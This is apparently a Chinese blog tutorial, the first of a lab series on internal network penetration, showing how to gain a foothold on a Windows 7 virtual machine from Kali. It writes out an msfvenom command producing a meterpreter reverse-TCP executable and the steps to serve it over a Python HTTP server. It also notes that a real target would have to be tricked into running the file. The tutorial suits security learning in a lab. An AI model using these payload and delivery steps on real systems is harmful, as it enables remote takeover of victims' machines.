内网渗透（一）：获得权限

内网渗透（一）：获得权限

文章目录

• 前言
• 实战
• • 准备
  • 攻击
• 后记

前言

本博文仅供学习使用，请勿他用！！！

网络安全成为当下最热门的话题，如何维护网络安全是关键，而内网渗透测试又是其中最重要的部分，接下来博主将会通过系列文章，对内网渗透进行介绍与复现；

内网渗透（一）：获得权限
内网渗透（二）：权限提升
内网渗透（三）：信息收集
内网渗透（四）：数据包捕获

本文将会介绍如何获取一个系统的权限；
 

实战

准备

打开两个虚拟机，这里我用的是 kali 和 windows7，kali 作为攻击机，那么 windows7 就作为肉鸡；

查看两台机子的 IP：

Kali IP

Windows7 IP

ping 一下，可以连通，那就开始攻击准备；

 

攻击

1、生成一个针对 windows 的攻击文件，<：

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.13.128 LPORT=4444 -f exe -
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: 

2、另开窗口，打开 msfconsole，设置一下监听脚本：

3、将这个反弹 Payload 传给 windows，这里使用 python 建立连接，真实场景需要通过社工让目标接收并启动：

root@kali:~# python -m SimpleHTTPServer 888
Serving HTTP on 0.0.0.0 port 888 ...

在 windows 中，打开浏览器输入 ip:prot，点击 < 进行下载：

4、开始监听，然后运行 < 文件：

成功监听到了 windows；

5、接下来就可以进行一些简单的操作了，这里就不过多赘述：

后记

其实不难发现，我们只是获得了一个较低的权限，之后会介绍如何提升权限来做更多的事情；

个人网站：

• 【安全】内网渗透（一）：获得权限
• 【安全】内网渗透（二）：权限提升
• 【安全】内网渗透（三）：信息收集
• 【安全】内网渗透（四）：数据包捕获

本博文仅供学习使用，请勿他用！！！